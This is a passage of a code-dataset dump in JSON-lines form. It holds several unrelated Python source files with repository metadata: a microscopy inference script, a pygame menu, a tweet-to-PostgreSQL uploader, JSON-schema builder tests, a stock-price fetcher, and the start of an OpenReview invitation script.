\"(...)/setup01/HeLa_Cell2_4x4x4nm/offsets_volumes_masks_foreground_shape180x180x180.json\"\n offset_filename = \"offsets_{0:}_shape{1:}x{2:}x{3:}.json\".format(\n mask_ds.replace(\"/\", \"_\"), *output_shape_wc\n )\n offset_file = os.path.join(output_dir, offset_filename)\n\n # prepare datasets\n factor, scale, shift = get_contrast_adjustment(\n rf, raw_ds, factor, min_sc, max_sc\n )\n\n f = zarr.open(out_file)\n dataset_target_keys = [\"raw_blurred\"]\n for dstk in dataset_target_keys:\n if dstk not in f:\n ds = f.empty(\n name=dstk,\n shape=full_shape_vc_output,\n compressor=numcodecs.GZip(6),\n dtype=\"uint8\",\n chunks=chunk_shape_vc,\n )\n else:\n ds = f[dstk]\n ds.attrs[\"resolution\"] = tuple(voxel_size)[::-1]\n ds.attrs[\"offset\"] = (0, 0, 0)\n ds.attrs[\"raw_data_path\"] = raw_data_path\n ds.attrs[\"raw_ds\"] = raw_ds\n ds.attrs[\"parent_dataset_id\"] = dataset_id\n ds.attrs[\"sigma\"] = sigma\n ds.attrs[\"raw_scale\"] = scale\n ds.attrs[\"raw_shift\"] = shift\n ds.attrs[\"raw_normalize_factor\"] = factor\n ds.attrs[\"float_range\"] = float_range\n ds.attrs[\"safe_scale\"] = safe_scale\n\n if not os.path.exists(offset_file):\n generate_full_list(offset_file, output_shape_wc, raw_data_path, raw_ds)\n shapes_file = os.path.join(\n setup_path, \"shapes_steps_{0:}x{1:}x{2:}.json\".format(*size)\n )\n if not os.path.exists(shapes_file):\n shapes = {\n \"input_shape_vc\": tuple(int(isv) for isv in input_shape_vc),\n \"output_shape_vc\": tuple(int(osv) for osv in output_shape_vc),\n \"chunk_shape_vc\": tuple(int(csv) for csv in chunk_shape_vc),\n }\n with open(shapes_file, \"w\") as f:\n json.dump(shapes, f)\n\n p_proc = re.compile(\"list_gpu_\\d+_\\S+_processed.txt\")\n print(any([p_proc.match(f) is not None for f in os.listdir(out_file)]))\n if any([p_proc.match(f) is not None for f in os.listdir(out_file)]):\n print(\"Redistributing offset lists over {0:} jobs\".format(n_jobs))\n redistribute_offset_lists(list(range(n_jobs)), out_file)\n else:\n with open(offset_file, \"r\") as f:\n offset_list = json.load(f)\n offset_list_from_precomputed(offset_list, list(range(n_jobs)), out_file)\n return input_shape_vc, output_shape_vc, chunk_shape_vc\n\n\ndef preprocess(data, scale=2, shift=-1.0, factor=None):\n return clip(scale_shift(normalize(data, factor=factor), scale, shift))\n\n\ndef single_job_inference(\n job_no,\n raw_data_path,\n sigma,\n raw_ds,\n setup_path,\n output_path=None,\n factor=None,\n min_sc=None,\n max_sc=None,\n float_range=(-1, 1),\n safe_scale=False,\n n_cpus=5,\n):\n\n output_dir, out_file = get_output_paths(raw_data_path, setup_path, output_path)\n offset_file = os.path.join(out_file, \"list_gpu_{0:}.json\".format(job_no))\n if not os.path.exists(offset_file):\n return\n\n with open(offset_file, \"r\") as f:\n offset_list = json.load(f)\n\n rf = zarr.open(raw_data_path, mode=\"r\")\n shape_vc = rf[raw_ds].shape\n weight_meta_graph = os.path.join(setup_path, \"blur_{0:}\".format(float(sigma)))\n inference_meta_graph = os.path.join(setup_path, \"blur_{0:}\".format(float(sigma)))\n\n net_io_json = os.path.join(setup_path, \"net_io_names.json\")\n with open(net_io_json, \"r\") as f:\n net_io_names = json.load(f)\n\n shapes_file = os.path.join(\n setup_path, \"shapes_steps_{0:}x{1:}x{2:}.json\".format(*size)\n )\n with open(shapes_file, \"r\") as f:\n shapes = json.load(f)\n input_shape_vc, output_shape_vc, chunk_shape_vc = (\n shapes[\"input_shape_vc\"],\n shapes[\"output_shape_vc\"],\n shapes[\"chunk_shape_vc\"],\n )\n\n input_key = net_io_names[\"raw_input\"]\n 
network_output_keys = net_io_names[\"output\"]\n dataset_target_keys = [\"raw_blurred\"]\n\n input_shape_wc = Coordinate(input_shape_vc) * voxel_size\n output_shape_wc = Coordinate(output_shape_vc) * voxel_size\n chunk_shape_wc = Coordinate(chunk_shape_vc) * voxel_size\n\n prediction = TensorflowPredict(\n weight_meta_graph,\n inference_meta_graph,\n input_keys=input_key,\n output_keys=network_output_keys,\n has_trained_variables=False,\n )\n\n t_predict = time.time()\n\n factor, scale, shift = get_contrast_adjustment(rf, raw_ds, factor, min_sc, max_sc)\n\n run_inference_zarr_multi_crop(\n prediction,\n functools.partial(preprocess, factor=1.0 / factor, scale=scale, shift=shift),\n functools.partial(\n clip_float_to_uint8, float_range=float_range, safe_scale=safe_scale\n ),\n raw_data_path,\n out_file,\n offset_list,\n network_input_shapes_wc=[\n input_shape_wc,\n ],\n network_output_shape_wc=output_shape_wc,\n chunk_shape_wc=chunk_shape_wc,\n input_keys=[\n raw_ds,\n ],\n target_keys=dataset_target_keys,\n input_resolutions=[\n tuple(voxel_size),\n ],\n target_resolutions=[\n tuple(voxel_size),\n ]\n * len(dataset_target_keys),\n log_processed=os.path.join(\n os.path.dirname(offset_file),\n \"list_gpu_{0:}_{1:}_processed.txt\".format(job_no, sigma),\n ),\n pad_value=int(round(-factor * (shift / scale))),\n num_cpus=n_cpus,\n )\n\n t_predict = time.time() - t_predict\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"action\", type=str, choices=(\"prepare\", \"inference\"))\n parser.add_argument(\"n_job\", type=int)\n parser.add_argument(\"n_cpus\", type=int)\n parser.add_argument(\"dataset_id\", type=str)\n parser.add_argument(\"sigma\", type=float)\n parser.add_argument(\"--raw_data_path\", type=str, default=\"None\")\n parser.add_argument(\"--raw_ds\", type=str, default=\"volumes/raw/s0\")\n parser.add_argument(\"--mask_ds\", type=str, default=\"volumes/masks/foreground\")\n parser.add_argument(\"--setup_path\", type=str, default=\".\")\n parser.add_argument(\"--output_path\", type=str, default=None)\n parser.add_argument(\"--finish_interrupted\", type=bool, default=False)\n parser.add_argument(\"--factor\", type=int, default=None)\n parser.add_argument(\"--min_sc\", type=float, default=None)\n parser.add_argument(\"--max_sc\", type=float, default=None)\n parser.add_argument(\"--float_range\", type=int, nargs=\"+\", default=(-1, 1))\n parser.add_argument(\"--safe_scale\", type=bool, default=False)\n args = parser.parse_args()\n print(args)\n action = args.action\n dataset_id = args.dataset_id\n if args.raw_data_path == \"None\":\n raw_data_path = os.path.join(\n config_loader.get_config()[\"organelles\"][\"data_path\"],\n dataset_id,\n dataset_id + \".n5\",\n )\n else:\n raw_data_path = args.raw_data_path\n assert os.path.exists(raw_data_path), \"Path {raw_data:} does not exist\".format(\n raw_data=raw_data_path\n )\n output_path = args.output_path\n sigma = args.sigma\n n_job = args.n_job\n n_cpus = args.n_cpus\n raw_ds = args.raw_ds\n if args.mask_ds == \"None\":\n mask_ds = None\n else:\n mask_ds = args.mask_ds\n setup_path = args.setup_path\n factor = args.factor\n min_sc = args.min_sc\n max_sc = args.max_sc\n float_range = tuple(args.float_range)\n assert len(float_range) == 2\n safe_scale = args.safe_scale\n finish_interrupted = args.finish_interrupted\n if action == \"prepare\":\n prepare_cell_inference(\n n_job,\n raw_data_path,\n dataset_id,\n sigma,\n raw_ds,\n setup_path,\n output_path,\n factor,\n min_sc,\n max_sc,\n float_range,\n 
safe_scale,\n n_cpus,\n finish_interrupted,\n )\n # elif action == \"run\":\n # input_shape_vc, output_shape_vc, chunk_shape_vc = prepare_cell_inference(n_job, raw_data_path, iteration,\n # raw_ds, mask_ds, setup_path, factor,\n # min_sc, max_sc, finish_interrupted)\n # submit_jobs(n_job, input_shape_vc, output_shape_vc, chunk_shape_vc, raw_data_path, iteration, raw_ds,\n # setup_path, factor=factor, min_sc=min_sc, max_sc=max_sc)\n\n elif action == \"inference\":\n single_job_inference(\n n_job,\n raw_data_path,\n sigma,\n raw_ds,\n setup_path,\n output_path=output_path,\n factor=factor,\n min_sc=min_sc,\n max_sc=max_sc,\n float_range=float_range,\n safe_scale=safe_scale,\n n_cpus=n_cpus,\n )\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/visualization/generate_blur_examples.py","file_name":"generate_blur_examples.py","file_ext":"py","file_size_in_byte":14364,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"18029666799","text":"import pygame\r\nfrom main.StateManager import getManager\r\nfrom state.GameState import GameState\r\nfrom state.PlayState import PlayState\r\nfrom utility.Button import Button\r\nfrom pygame.locals import *\r\nfrom utility.Image import Image\r\nfrom utility.Constants import settingsButtonDim, windowDim, loadImage\r\n\r\nclass SettingsState(GameState):\r\n \r\n pressed = False\r\n \r\n def __init__(self):\r\n self.players = -1\r\n centerx = windowDim / 2 \r\n \r\n #BG\r\n self.images = pygame.sprite.RenderPlain()\r\n bgImage, bgRect = loadImage(\"BG.png\")\r\n bg = Image(bgImage, bgRect)\r\n self.images.add(bg)\r\n\r\n #Initialize Buttons\r\n self.buttons = pygame.sprite.RenderPlain()\r\n self.twoPlayersButton = Button(centerx, 150, settingsButtonDim, \"2PlayerButton.png\")\r\n self.threePlayersButton = Button(centerx, 300, settingsButtonDim, \"3PlayerButton.png\")\r\n self.fourPlayersButton = Button(centerx, 450, settingsButtonDim, \"4PlayerButton.png\")\r\n \r\n self.buttons.add(self.twoPlayersButton, self.threePlayersButton, self.fourPlayersButton)\r\n \r\n def update(self):\r\n players = -1\r\n \r\n for event in pygame.event.get(): \r\n if event.type == QUIT:\r\n return False\r\n \r\n currPressed = pygame.mouse.get_pressed()[0]\r\n \r\n for button in self.buttons:\r\n button.update(currPressed)\r\n \r\n released = not currPressed and self.pressed\r\n \r\n if released:\r\n if self.twoPlayersButton.mouseIn():\r\n players = 2\r\n if self.threePlayersButton.mouseIn():\r\n players = 3\r\n if self.fourPlayersButton.mouseIn():\r\n players = 4\r\n \r\n if players is not -1:\r\n getManager().set(PlayState(players))\r\n \r\n self.pressed = currPressed\r\n return True\r\n \r\n def render(self, screen):\r\n self.images.draw(screen)\r\n self.buttons.draw(screen)","repo_name":"XeraRequiem/Disc-Wars","sub_path":"state/SettingsState.py","file_name":"SettingsState.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10452079276","text":"import json\r\nimport os\r\nimport re\r\nimport sys\r\nimport glob\r\nimport pytz\r\n\r\n__UTC__ = pytz.UTC\r\n\r\nfrom datetime import datetime, timezone\r\nfrom psycopg2 import extras as ext\r\nfrom psycopg2.extras import Json\r\nfrom pprint import pprint\r\nfrom tqdm import tqdm\r\n\r\nfrom twitter2sql.core import sql_statements\r\nfrom twitter2sql.core.util import clean, get_last_modified, \\\r\n within_time_bounds, open_database, close_database, \\\r\n 
get_column_header_dict\r\n\r\n\r\n# CREATE_TABLE_STMT = sql_statements.CREATE_TABLE_STMT\r\n# INSERT_TWEET_STMT = sql_statements.INSERT_TWEET_STMT\r\n\r\n\r\n\"\"\"1. Configure parameters\r\n\r\nText search\r\nThis will search the full text of the tweet, any retweeted_status text, and any\r\n quoted_status text.\r\n\r\n`search_text`: set to True if you want to use text search\r\n`keywords`: add the keywords you want to match here\r\n`all_keywords`: whether to check for all keywords. If true, it will match only\r\n tweets that have all keywords. If false it will check whether any of the \r\n keywords exist\r\n\r\n\"\"\"\r\n\r\n\r\n# @profile\r\ndef upload_twitter_2_sql(database_name,\r\n db_config_file,\r\n twitter_json_folders,\r\n table_format_csv,\r\n table_name='example_table',\r\n owner='example',\r\n admins=[],\r\n search_text=False,\r\n keywords=['keyword1', 'keyword2'],\r\n all_keywords=False,\r\n match_dates=True,\r\n start_time=None,\r\n end_time=datetime.utcnow().replace(tzinfo=timezone.utc),\r\n use_regex_match=False,\r\n reg_expr='example_regex',\r\n overwrite_db=True,\r\n overwrite=True,\r\n timestamp='modified',\r\n json_mode='newline'):\r\n \r\n create_table_statement = sql_statements.create_table_statement(table_format_csv, table_name)\r\n insert_table_statement = sql_statements.insert_statement(table_format_csv, table_name)\r\n database, cursor = open_database(database_name, db_config_file, overwrite_db, owner, admins)\r\n\r\n if overwrite:\r\n # This errors if the tweets table does not yet exist.\r\n # Fix that!\r\n cursor.execute(\"DROP TABLE IF EXISTS tweets;\")\r\n pass\r\n else:\r\n # Not sure what should happen in this case.\r\n print('Table already exists, and overwrite=False. Exiting.')\r\n return\r\n cursor.execute(create_table_statement)\r\n database.commit()\r\n\r\n # Add admins to the table.\r\n admin_add_statement = sql_statements.table_permission_statement(table_name, admins)\r\n cursor.execute(admin_add_statement)\r\n database.commit()\r\n\r\n column_header_dict = get_column_header_dict(table_format_csv)\r\n\r\n try:\r\n\r\n # Keep track of how many tweets have been inserted (just make sure it's running)\r\n total_tweets_inserted = 0\r\n\r\n # Process each folder\r\n for folder_path in twitter_json_folders:\r\n\r\n # Make sure only valid .json files are processed\r\n json_files_to_process = glob.glob(os.path.join(folder_path, '*.json'))\r\n\r\n # Filter to only include files within the date range:\r\n # this specifically filters out JSON files by the file's last modified time (UNIX timestamp), only keeping\r\n # files written on or after the early time bound and on or before the late time bound plus one day\r\n # (to allow time for tweets to be written to the file)\r\n if match_dates:\r\n \r\n json_files_to_process = sorted(json_files_to_process, key=lambda json_file: get_last_modified(os.path.abspath(json_file)))\r\n\r\n print(\"{} JSON files before time filtering: from {} to {}\".format(\r\n len(json_files_to_process), json_files_to_process[0], json_files_to_process[-1]))\r\n\r\n json_files_to_process = [json_file for json_file in json_files_to_process if within_time_bounds(os.path.abspath(json_file), start_time, end_time)]\r\n \r\n print(\"{} JSON files after time filtering: from {} to {}\".format(\r\n len(json_files_to_process), json_files_to_process[0], json_files_to_process[-1]))\r\n\r\n progress_bar = tqdm(json_files_to_process, desc='0/0 tweets inserted')\r\n for idx, json_file in enumerate(progress_bar):\r\n # For each file, extract the tweets and 
add the number extracted to the total_tweets_inserted\r\n total_tweets_inserted += extract_json_file(os.path.join(folder_path, json_file), cursor, database, keywords,\r\n search_text, all_keywords, insert_table_statement, match_dates, start_time, end_time, use_regex_match, \r\n reg_expr, column_header_dict, json_mode=json_mode)\r\n\r\n progress_bar.set_description(\"{fnum}/{ftotal_tweets_inserted}: {tnum} tweets inserted\".format(fnum=idx, ftotal_tweets_inserted=(len(json_files_to_process) + 1), tnum=total_tweets_inserted))\r\n sys.stdout.flush()\r\n\r\n # Close everything\r\n close_database(cursor, database)\r\n\r\n except KeyboardInterrupt:\r\n close_database(cursor, database)\r\n except Exception:\r\n close_database(cursor, database)\r\n raise\r\n\r\n return\r\n\r\n\r\n# @profile\r\ndef extract_json_file(json_file_path, cursor, database, keywords, search_text, \r\n all_keywords,\r\n insert_table_statement,\r\n match_dates=True,\r\n start_time=None,\r\n end_time=datetime.utcnow().replace(tzinfo=timezone.utc),\r\n use_regex_match=False,\r\n reg_expr='example_regex',\r\n column_header_dict=None,\r\n json_mode='newline'):\r\n\r\n with open(json_file_path, 'r') as infile:\r\n queue = []\r\n\r\n if json_mode == 'newline':\r\n lines = [line for line in infile if (line and len(line) >= 2)] # ????\r\n elif json_mode == 'list':\r\n lines = json.load(infile)\r\n\r\n for line in lines:\r\n\r\n # Load the tweet string into a dictionary.\r\n # There's like one tweet in one json file that is bad json, so I've just been skipping\r\n # it. If there end up being a lot, we should probably figure out why that's happening.\r\n try:\r\n if json_mode == 'newline':\r\n tweet = json.loads(line)\r\n else:\r\n tweet = line\r\n \r\n # Make sure that the tweet matches all filtering parameters\r\n if matches_parameters(tweet, search_text, keywords, all_keywords, match_dates, \r\n start_time, end_time, use_regex_match, reg_expr):\r\n tweet_row = extract_tweet(tweet, column_header_dict)\r\n \r\n if tweet_row:\r\n queue.append(tweet_row)\r\n \r\n except ValueError as e:\r\n print(\"Bad JSON\")\r\n print(\"Error: {}\".format(e))\r\n print(line)\r\n \r\n # Insert all the extracted tweets into the database\r\n try:\r\n ext.execute_batch(cursor, insert_table_statement, queue)\r\n except Exception as e:\r\n print(json_file_path)\r\n raise(e)\r\n \r\n # Just to keep track of how many have been inserted\r\n return len(queue)\r\n\r\n\r\n# @profile\r\ndef matches_parameters(tweet, \r\n search_text=False,\r\n keywords=['keyword1', 'keyword2'],\r\n all_keywords=False,\r\n match_dates=True,\r\n start_time=None,\r\n end_time=datetime.utcnow().replace(tzinfo=timezone.utc),\r\n use_regex_match=False,\r\n reg_expr='example_regex'):\r\n \r\n # Keyword filtering \r\n if search_text:\r\n # Make a list of fields to check for keyword matches (could add user_description, etc.)\r\n keyword_texts = [get_complete_text(tweet)]\r\n\r\n def matches_keywords(text):\r\n matches = get_matching_keywords(text, keywords)\r\n\r\n if all_keywords:\r\n return matches == keywords # only return True if all keywords matched\r\n else:\r\n return bool(matches) # return True if there's at least one match\r\n\r\n keyword_matches = [matches_keywords(keyword_text) for keyword_text in keyword_texts]\r\n\r\n if not any(keyword_matches):\r\n return False\r\n\r\n # Time interval filtering\r\n \r\n if match_dates:\r\n created_at = get_nested_value(tweet, \"created_at\")\r\n created_ts = __UTC__.localize(datetime.strptime(created_at[0:19] + created_at[25:], \"%a %b %d 
%H:%M:%S %Y\"))\r\n \r\n if not created_ts or created_ts < start_time or created_ts > end_time:\r\n return False\r\n \r\n \"\"\"\r\n Regex matching. This part may not be functional, review --ALB.\r\n \"\"\"\r\n \r\n if use_regex_match:\r\n # Make a list of fields to check for keyword matches\r\n regex_texts = [get_complete_text(tweet)]\r\n regex_matches = [bool(re.search(reg_expr, text)) for text in regex_texts]\r\n if not any(regex_matches):\r\n return False\r\n \r\n return True\r\n\r\n\r\n# @profile\r\ndef get_complete_text(tweet):\r\n\r\n \"\"\" Previously, strings in complete_text had been encoded into\r\n utf-8. I undid that, but there may be a reason to put that\r\n back in later. Used the c() function.\r\n \"\"\"\r\n\r\n if 'text' in tweet:\r\n tweet_complete_text = tweet[\"text\"]\r\n else:\r\n tweet_complete_text = tweet['full_text']\r\n\r\n if tweet[\"truncated\"]:\r\n # Applicable to original tweets and commentary on quoted tweets\r\n tweet_complete_text = tweet[\"extended_tweet\"][\"full_text\"]\r\n\r\n # This handles retweets of original tweets and retweets of quoted tweets\r\n if \"retweeted_status\" in tweet:\r\n return_text = \"RT @{username}: {orig_complete_text}\".format(\r\n username=tweet[\"retweeted_status\"][\"user\"][\"screen_name\"],\r\n orig_complete_text=get_complete_text(tweet[\"retweeted_status\"]))\r\n return return_text\r\n\r\n # I am fairly certain that the only way you can quote a tweet is by \r\n # quoting the original tweet; i.e. I don't think you can quote a retweet\r\n elif \"quoted_status\" in tweet:\r\n return_text = \"{qt_complete_text} QT @{username}: {orig_complete_text}\".format(\r\n qt_complete_text=tweet_complete_text,\r\n username=tweet[\"quoted_status\"][\"user\"][\"screen_name\"],\r\n orig_complete_text=get_complete_text(tweet[\"quoted_status\"]))\r\n return return_text\r\n\r\n else:\r\n return tweet_complete_text\r\n\r\n\r\n# @profile\r\ndef get_matching_keywords(search_string, keywords):\r\n\r\n \"\"\" This function uses regular expressions to search for keywords in a tweet.\r\n \"\"\"\r\n\r\n # keyword_regex = r\"(\\b({reg}))|(({reg})\\b)\".format(reg=\"|\".join(keywords))\r\n keywords = [\"(\\\\b\" + x + \"\\\\b)\" if x[0] != '#'\r\n else '(' + x + \"\\\\b)\" for x in keywords]\r\n keyword_regex = r\"({reg})\".format(reg=\"|\".join(keywords))\r\n matches = []\r\n\r\n # Temporary fix for bytes/string mixing in earlier code.\r\n if type(search_string) is bytes:\r\n search_string = search_string.decode('utf-8')\r\n\r\n for match in re.findall(keyword_regex, search_string.lower()):\r\n matches = matches + list([m for m in match if m])\r\n matches = list(set(matches))\r\n return matches\r\n\r\n\r\n# @profile\r\ndef get_nested_value_json(_dict, path, default=None):\r\n # Pull the nested value\r\n value = get_nested_value(_dict, path, default)\r\n\r\n # Return a string of the json dictionary\r\n if value:\r\n return json.dumps(value)\r\n\r\n\r\n# @profile\r\ndef get_nested_value(outer_dict, path_str, default=None):\r\n\r\n \"\"\"\r\n Get a value from the given dictionary by following the path\r\n If the path isn't valid, nothing will be returned.\r\n \"\"\"\r\n\r\n # get a list of nested dictionary keys (the path)\r\n path = path_str.split(\".\")\r\n current_dict = outer_dict\r\n\r\n # step through the path and try to process it\r\n try:\r\n for step in path:\r\n # If it's actually a list index, convert it to an integer\r\n if step.isdigit():\r\n step = int(step)\r\n\r\n # Get the nested value associated with that key\r\n current_dict = 
current_dict[step]\r\n\r\n # Once it's at the end of the path, return the nested value\r\n return current_dict\r\n\r\n # The value didn't exist\r\n except (KeyError, TypeError, IndexError):\r\n # pprint(outer_dict)\r\n # print(path_str)\r\n # raise e\r\n pass\r\n\r\n return default\r\n\r\n\r\ndef extract_tweet(tweet, column_header_dict):\r\n # Adding everything to a huge tuple and inserting the tuple to the database\r\n # TODO: Problems here with extended entites.\r\n\r\n entities = tweet[\"entities\"]\r\n extended_entities = None\r\n if 'extended_entities' in tweet:\r\n extended_entities = tweet['extended_entities']\r\n if tweet[\"truncated\"]:\r\n entities = tweet[\"extended_tweet\"][\"entities\"]\r\n if 'extended_entities' in tweet['extended_tweet']:\r\n extended_entities = tweet['extended_tweet']['extended_entities']\r\n elif \"retweeted_status\" in tweet:\r\n if tweet[\"retweeted_status\"][\"truncated\"]:\r\n entities = tweet[\"retweeted_status\"][\"extended_tweet\"][\"entities\"]\r\n if 'extended_entities' in tweet['retweeted_status']['extended_tweet']:\r\n extended_entities = tweet[\"retweeted_status\"][\"extended_tweet\"][\"extended_entities\"]\r\n else:\r\n entities = tweet[\"retweeted_status\"][\"entities\"]\r\n if 'extended_entities' in tweet['retweeted_status']:\r\n extended_entities = tweet[\"retweeted_status\"][\"extended_entities\"]\r\n\r\n item = []\r\n for key, value in column_header_dict.items():\r\n\r\n if key == 'id':\r\n add_item = tweet[\"id\"]\r\n elif key == 'complete_text':\r\n add_item = clean(get_complete_text(tweet))\r\n elif key == 'entities':\r\n add_item = clean(json.dumps(entities))\r\n elif value['type'] == 'timestamp':\r\n time = get_nested_value(tweet, value['instructions'])\r\n add_item = datetime.strptime(time[0:19] + time[25:], \"%a %b %d %H:%M:%S %Y\")\r\n else:\r\n if key == 'video_url_0':\r\n add_item = get_nested_value(entities, value[\"json_fieldname\"])\r\n if add_item is not None:\r\n for variant in add_item:\r\n if variant['content_type'] != 'application/x-mpegURL':\r\n add_item = variant['url']\r\n elif key == 'urls':\r\n add_item = get_nested_value_json(entities, value[\"json_fieldname\"])\r\n elif key == 'photo':\r\n add_item = False\r\n if 'media' in entities:\r\n for media in entities['media']:\r\n if media['type'] == 'photo':\r\n add_item = True\r\n if extended_entities is not None: \r\n if 'media' in extended_entities:\r\n for media in extended_entities['media']:\r\n if media['type'] == 'photo':\r\n add_item = True\r\n elif key == 'video':\r\n add_item = False\r\n if 'media' in entities:\r\n for media in entities['media']:\r\n if media['type'] == 'video':\r\n add_item = True\r\n if extended_entities is not None:\r\n if 'media' in extended_entities:\r\n for media in extended_entities['media']:\r\n if media['type'] == 'video':\r\n add_item = True\r\n elif value['instructions'] == 'entities':\r\n add_item = get_nested_value(entities, value[\"json_fieldname\"])\r\n elif value['instructions'] == 'extended_entities':\r\n add_item = get_nested_value(extended_entities, value[\"json_fieldname\"])\r\n elif value['instructions'] == 'dump_json':\r\n add_item = json.dumps(tweet)\r\n elif value['type'] == 'json':\r\n add_item = get_nested_value_json(tweet, value[\"json_fieldname\"])\r\n else:\r\n add_item = get_nested_value(tweet, value[\"json_fieldname\"])\r\n\r\n if value['clean'] and value['type'] != 'boolean':\r\n add_item = clean(add_item)\r\n\r\n item += [add_item]\r\n\r\n return item\r\n\r\n\r\nif __name__ == '__main__':\r\n 
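# NOTE: upload_twitter_2_sql() has required positional parameters (database\r\n    # name, config file, JSON folders, table-format CSV); this bare call is the\r\n    # original placeholder entry point and will raise TypeError if run as-is.\r\n    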
upload_twitter_2_sql()","repo_name":"AndrewBeers/Twitter2SQL","sub_path":"twitter2sql/core/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":17147,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35140197279","text":"from genson import SchemaBuilder\nfrom genson.schema.strategies import SchemaStrategy, Number\nfrom . import base\n\n\nclass MaxTenStrategy(Number):\n KEYWORDS = tuple(list(Number.KEYWORDS) + ['maximum'])\n\n def to_schema(self):\n schema = super().to_schema()\n schema['maximum'] = 10\n return schema\n\n\nclass FalseStrategy(SchemaStrategy):\n KEYWORDS = tuple(list(SchemaStrategy.KEYWORDS) + ['const'])\n\n @classmethod\n def match_schema(self, schema):\n return True\n\n @classmethod\n def match_object(self, obj):\n return True\n\n def to_schema(self):\n schema = super().to_schema()\n schema['type'] = 'boolean'\n schema['const'] = False\n return schema\n\n\nclass MaxTenSchemaBuilder(SchemaBuilder):\n EXTRA_STRATEGIES = (MaxTenStrategy,)\n\n\nclass FalseSchemaBuilder(SchemaBuilder):\n STRATEGIES = (FalseStrategy,)\n\n\nclass TestExtraStrategies(base.SchemaNodeTestCase):\n CLASS = MaxTenSchemaBuilder\n\n def test_add_object(self):\n self.add_object(5)\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'integer',\n 'maximum': 10})\n\n def test_add_schema(self):\n self.add_schema({'type': 'integer'})\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'integer',\n 'maximum': 10})\n\n\nclass TestClobberStrategies(base.SchemaNodeTestCase):\n CLASS = FalseSchemaBuilder\n\n def test_add_object(self):\n self.add_object(\"Any Norwegian Jarlsberger?\")\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'boolean',\n 'const': False}, enforceUserContract=False)\n\n def test_add_schema(self):\n self.add_schema({'type': 'string'})\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'boolean',\n 'const': False}, enforceUserContract=False)\n","repo_name":"wolverdude/GenSON","sub_path":"test/test_custom.py","file_name":"test_custom.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":507,"dataset":"github-code","pt":"37"} +{"seq_id":"33496609967","text":"import pandas_datareader.data as pdr\nimport fix_yahoo_finance as fix\nimport time\nfix.pdr_override()\n\n\ndef get_stock_data(ticker, start_date, end_date):\n \"\"\"\n Gets historical stock data of given tickers between dates\n :param ticker: company, or companies whose data is to fetched\n :type ticker: string or list of strings\n :param start_date: starting date for stock prices\n :type start_date: string of date \"YYYY-mm-dd\"\n :param end_date: end date for stock prices\n :type end_date: string of date \"YYYY-mm-dd\"\n :return: stock_data.csv\n \"\"\"\n i = 1\n try:\n all_data = pdr.get_data_yahoo(ticker, start_date, end_date)\n except ValueError:\n print(\"ValueError, trying again\")\n i += 1\n if i < 5:\n time.sleep(10)\n get_stock_data(ticker, start_date, end_date)\n else:\n print(\"Tried 5 times, Yahoo error. 
Trying after 2 minutes\")\n time.sleep(120)\n get_stock_data(ticker, start_date, end_date)\n stock_data = all_data[\"Adj Close\"]\n stock_data.to_csv(\"stock_prices.csv\")\n\n\ndef get_sp500(start_date, end_date):\n \"\"\"\n Gets sp500 price data\n :param start_date: starting date for sp500 prices\n :type start_date: string of date \"Y-m-d\"\n :param end_date: end date for sp500 prices\n :type end_date: string of date \"Y-m-d\"\n :return: sp500_data.csv\n \"\"\"\n i = 1\n try:\n sp500_all_data = pdr.get_data_yahoo(\"SPY\", start_date, end_date)\n except ValueError:\n print(\"ValueError, trying again\")\n i += 1\n if i < 5:\n time.sleep(10)\n get_stock_data(start_date, end_date)\n else:\n print(\"Tried 5 times, Yahoo error. Trying after 2 minutes\")\n time.sleep(120)\n get_stock_data(start_date, end_date)\n sp500_data = sp500_all_data[\"Adj Close\"]\n sp500_data.to_csv(\"sp500_data.csv\")\n\n\nif __name__ == \"__main__\":\n get_stock_data(\"AAPL\", \"2018-05-01\", \"2018-06-01\")\n # get_sp500(\"2018-05-01\", \"2018-06-01\")\n","repo_name":"VivekPa/IntroNeuralNetworks","sub_path":"get_prices.py","file_name":"get_prices.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"37"} +{"seq_id":"2792688877","text":"#!/usr/bin/python\n\n\"\"\"\nA script for managing invitations.\n\nYou can create, enable, or disable most invitations in ICLR 2018 from this script.\n\nUsage:\n\npython toggle-invitations.py Public_Comment --enable\npython toggle-invitations.py Public_Comment --disable\n\"\"\"\n\n# Import statements\nimport argparse\nimport csv\nimport getpass\nimport sys\nimport re\nimport openreview\nfrom openreview import invitations\nfrom openreview import tools\nimport requests\nimport config\nimport pprint\nimport os\n\nconference = 'auai.org/UAI/2018'\nmask_authors_group = conference + \"/Paper/Authors\"\nmask_reviewers_group = conference + \"/Paper/Reviewers\"\nmask_areachair_group = conference + \"/Paper/Area_Chairs\"\nmask_anonac_group = conference + \"/Paper/Area_Chair[0-9]+\"\nmask_anonreviewer_group = conference + \"/Paper/AnonReviewer[0-9]+\"\nmask_allusers_group = conference + \"/Paper/All_Users\"\nmask_unsubmitted_group = conference + \"/Paper/Reviewers/Unsubmitted\"\nmask_submitted_group = conference + \"/Paper/Reviewers/Submitted\"\nprogram_chairs_id = conference + '/Program_Chairs'\nblind_submission_inv_id = conference + '/-/Blind_Submission'\n\ninvitation_templates = {\n 'Official_Comment': {\n 'id': conference + '/-/Paper/Official_Comment',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [\n mask_reviewers_group,\n #mask_authors_group,\n mask_areachair_group,\n program_chairs_id],\n 'noninvitees': [mask_unsubmitted_group],\n 'signatures': [conference],\n 'process': os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'),\n 'reply': {\n 'forum': '',\n 'replyto': None,\n 'readers': {\n 'description': 'Select all user groups that should be able to read this comment. 
